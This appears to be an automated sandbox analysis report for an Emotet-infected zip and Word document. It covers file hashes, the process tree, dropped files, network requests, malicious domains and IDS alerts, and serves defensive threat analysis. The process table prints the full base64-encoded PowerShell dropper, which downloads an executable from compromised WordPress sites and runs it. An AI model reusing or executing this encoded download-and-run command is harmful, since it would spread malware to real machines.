File name: | REP-20201015-B10855.zip |
Full analysis: | https://app.any.run/tasks/e565ac3b-af32-45dc-9c9c-8f0457a873f3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 19, 2020, 20:24:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v5.1 to extract |
MD5: | DC95A1A9107A53231EC70BD6C6F319FE |
SHA1: | 4F3C1021B09D9DF29529DED725AD35D5A56994F9 |
SHA256: | 6B992BC263A77A5E0B88BD628AC596DBF3129282D7D2C23A9B615CCFC1E495C2 |
SSDEEP: | 1536:voMpZMDEbNxI3vgaP2HcJ6UcQEGAVo3yTW2Q:vTMDEbNIjP2HcJUdo3yTZQ |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | REP-20201015-B10855.doc |
---|---|
ZipUncompressedSize: | 136178 |
ZipCompressedSize: | 65258 |
ZipCRC: | 0x65a9b282 |
ZipModifyDate: | 2020:10:15 00:57:01 |
ZipCompression: | Unknown (99) |
ZipBitFlag: | 0x0003 |
ZipRequiredVersion: | 51 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2488 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\REP-20201015-B10855.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
980 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\REP-20201015-B10855.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2356 | POwersheLL -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAHIATwBGAGkATABlAFwAQgAyADAARABZAGEAawBcAG8AdgBQAFEASABvADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBJAHQAYABZAHAAYABSAE8AVABgAG8AYwBPAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACkAKwAnACAAJwArACcAdABsACcAKwAnAHMAMQAnACsAKAAnADEALAAgAHQAbAAnACsAJwBzACcAKQApADsAJABDAHUANgB5AGgAMQB6ACAAPQAgACgAJwBWACcAKwAoACcAOQBvAGYAJwArACcAeQAnACkAKwAnAHgAcAAnACkAOwAkAEgAcQBkAHcAbABqAGkAPQAoACcARwBiACcAKwAoACcANAAnACsAJwB1ADAAMQAnACkAKwAnAHMAJwApADsAJABIAHcAegBxADgAeAAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AEIAMgAwACcAKwAnAGQAeQAnACsAJwBhACcAKwAnAGsAewAwAH0ATwB2AHAAcQBoAG8ANAB7ADAAfQAnACkAIAAgAC0ARgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKwAkAEMAdQA2AHkAaAAxAHoAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABVAHQAYgBrAGwAaQA2AD0AKAAnAEcAJwArACgAJwBhAHcAJwArACcAagBhAHkAJwApACsAJwBsACcAKQA7ACQAQQBjAGwAegBiADcANgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAUQB0ADkAYgB3AGUAcQA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAnACkAKwAoACcALwBuACcAKwAnAGUAJwApACsAKAAnAHcAJwArACcAYwBhACcAKQArACcAcgAnACsAKAAnAHQAdQByAGsAaQAnACsAJwB5ACcAKwAnAGUALgBjACcAKwAnAG8AbQAvAHcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBTAGIAcAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvAC8AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBsAGkAJwArACcAYQBuAHcAbQBpAG4AYQAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAJwArACcAcAAtACcAKQArACcAaQAnACsAKAAnAG4AYwAnACsAJwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcAWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AaABiAG0AJwArACcAbwBuAHQAJwApACsAJwBlACcAKwAnAC4AYwAnACsAJwBvACcAKwAnAG0ALwAnACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwB3ACcAKwAnAGUAJwArACcAcgAnACsAKAAnAC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAJwApACsAKAAnAGgAZQAnACsAJwB3AGEAawAnACsAJwBlAHMAJwApACsAKAAnAHQAdQAnACsAJwBkAGkAJwApACsAJwBvAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4ALwAnACsAJwAzAEQAJwArACgAJwAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwADoAJwArACcALwAnACsAJwAvAGYAJwArACcAbwByACcAKwAoACcAbQAnACsAJwBlAGQAYgB5AG0AZQAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAHcAcAAnACsAJwAtAGMAbwBuAHQAJwApACsAKAAnAGUAJwArACcAbgB0ACcAKQArACcALwAzACcAKwAoACcAZQAvACoAaAAnACsAJwB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAvACcAKwAnAC8AdQAnACkAKwAoACcAbgBpAHQAJwArACcAZQAnACkAKwAnAGQAdwAnACsAKAAnAGEAeQAnACsAJwAuACcAKQArACgAJwBnAGkAdgBpACcAKwAnAG4AZwAuACcAKwAnAGEAZwAnACkAKwAoACcAZQBuACcAKwAnAGMAJwApACsAJwB5ACcAKwAnAC8AcwAnACsAJwB5ACcAKwAoACcAcwAtACcAKwAnAGMAYQBjACcAKQArACcAaABlACcAKwAnAC8AJwArACcAWAAnACsAJwBuACcAKwAoACcAVAAnACsAJwAvACcAKwAnACoAaAB0AHQAcAA6ACcAKQArACcALwAvACcAKwAnAHAAJwArACcAYQByACcAKwAoACcAdABuACcAKwAnAGUAcgBzAC4AcgAnACkAKwAoACcAaQBwACcAKwAnAHAAbABlACcAKQArACgAJwBhAGwAcABoACcAKwAnAGEALgBjAG8AJwApACsAKAAnAG0ALwBkACcAKwAnAGEAJwArACcAdABhAC8AJwApACsAKAAnAHUAJwArACcAbAB0AGkAbQAnACkAKwAoACcAYQB0AGUAbQBlAG0AYgAnACsAJwBlACcAKwAnAHIALwBMACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AYwBhAHYAcAA4ADMAKQA7ACQATAA1ADMANQB6AG0AZQA9ACgAKAAnAEQAcwAnACsAJwAzAHUAZQAnACkAKwAnADMAJwArACcAcAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFADEAMwBqAGUAdwBzACAAaQBuACAAJABRAHQAOQBiAHcAZQBxACkAewB0AHIAeQB7ACQAQQBjAGwAegBiADcANgAuACIAZABgAE8AVwBuAEwAbwBBAGQAYABGAGkAYABMAGUAIgAoACQARQAxADMAagBlAHcAcwAsACAAJABIAHcAegBxADgAeAAxACkAOwAkAEwAZQBtAGYAdgBmADQAPQAoACgAJwBQAHEAbQAnACsAJwBrACcAKQArACcAeAAnACsAJwAwAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAdwB6AHEAOAB4ADEAKQAuACIAbABlAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADMAMgAwADcANAApACAAewAmACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABIAHcAegBxADgAeAAxACkAOwAkAFAAZQBlADAAegB2AHEAPQAoACcARwAnACsAKAAnAGYANABxAGsAJwArACcAdABzACcAKQApADsAYgByAGUAYQBrADsAJABNADUANwBsAGcAdwBrAD0AKAAnAFMAJwArACgAJwBpAGoAJwArACcAYQA1ACcAKwAnAGYAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQA2AHMAeABrAGYAMgA9ACgAKAAnAFgAMwBsAGEAXwAnACsAJwB3ACcAKQArACcAbAAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2224 | "C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe" | C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe | POwersheLL.exe | |
User: admin Integrity Level: MEDIUM Description: CWebUpdatePrj MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2664 | "C:\Users\admin\AppData\Local\mmc\KBDBR.exe" | C:\Users\admin\AppData\Local\mmc\KBDBR.exe | — | V9ofyxp.exe |
User: admin Integrity Level: MEDIUM Description: CWebUpdatePrj MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6EBC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2356 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVEZXJC78Y9RPTH7VZE9.temp | — | |
MD5:— | SHA256:— | |||
2356 | POwersheLL.exe | C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe | — | |
MD5:— | SHA256:— | |||
2356 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d79e8.TMP | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
2488 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\REP-20201015-B10855.doc | document | |
MD5:8EDA538E640B07BD409212750F9B5162 | SHA256:81D7FAF2D7827159CA55256325F29B7BCDB803AFD06F0955AE13D9C6D359DD16 | |||
2224 | V9ofyxp.exe | C:\Users\admin\AppData\Local\mmc\KBDBR.exe | executable | |
MD5:7C1316251B466712BED86B62248851B9 | SHA256:8829F7BB7464E79E622B61A8EC124AE5A8B7163429C0DEA4B7FEF621E6EE5007 | |||
980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\~$P-20201015-B10855.doc | pgc | |
MD5:2BCE4B949BDFDF03168F4461F87FD52A | SHA256:CEE13A5399A352783E2279B4E655BB5EECCDEE09D2E9EB1A9C0C37B6EB479DC2 | |||
2356 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
980 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A36F9EE544CBC950B964261846B3771B | SHA256:47CC8750D5982ABE42E243A3CEE79C1E2D1341891DB88A1054F6E440980CB7FD | |||
980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:144D727D3907E88E95D9DE6708F7FAB6 | SHA256:3E73FD8434B1A8B7816D0249E35265D0211F8F3BFD38086E613C1981A031F422 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2356 | POwersheLL.exe | GET | 301 | 85.95.231.40:80 | http://newcarturkiye.com/wp-admin/Sbp/ | TR | — | — | malicious |
2356 | POwersheLL.exe | GET | 404 | 85.95.231.40:80 | http://www.newcarturkiye.com/wp-admin/Sbp/ | TR | html | 9.23 Kb | malicious |
2356 | POwersheLL.exe | GET | 404 | 68.66.197.96:80 | http://hbmonte.com/wp-content/wer/ | US | html | 25.8 Kb | suspicious |
2356 | POwersheLL.exe | GET | 200 | 148.72.217.145:80 | http://thewakestudio.com/wp-admin/3D/ | US | executable | 339 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2356 | POwersheLL.exe | 85.95.231.40:80 | newcarturkiye.com | Inetmar internet Hizmetleri San. Tic. Ltd. Sti | TR | malicious |
2356 | POwersheLL.exe | 68.66.197.96:80 | hbmonte.com | A2 Hosting, Inc. | US | suspicious |
2356 | POwersheLL.exe | 104.27.165.223:80 | lilianwmina.com | Cloudflare Inc | US | shared |
2356 | POwersheLL.exe | 148.72.217.145:80 | thewakestudio.com | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
newcarturkiye.com |
| malicious |
www.newcarturkiye.com |
| malicious |
lilianwmina.com |
| suspicious |
hbmonte.com |
| suspicious |
thewakestudio.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2356 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2356 | POwersheLL.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2356 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2356 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |